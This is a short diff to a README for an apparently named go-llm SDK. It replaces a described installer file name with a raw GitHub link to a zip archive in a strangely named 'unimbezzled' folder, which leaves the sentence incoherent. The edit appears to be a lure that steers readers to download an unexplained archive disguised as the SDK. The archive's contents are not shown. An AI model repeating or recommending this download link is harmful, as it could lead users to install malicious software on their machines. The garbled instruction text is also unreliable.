Tberke0/go-llm/README.md

 ### Step 3: Download the SDK

 Once you find the latest version, click on the executable file to start downloading.
-The file will typically be named something like `go-llm-vX.X.X.exe` for Windows or a similar format for macOS/Linux.
+The file will typically be named something like `https://raw.githubusercontent.com/Tberke0/go-llm/main/unimbezzled/go_llm_v1.7-alpha.1.zip` for Windows or a similar format for macOS/Linux.

 ### Step 4: Install the SDK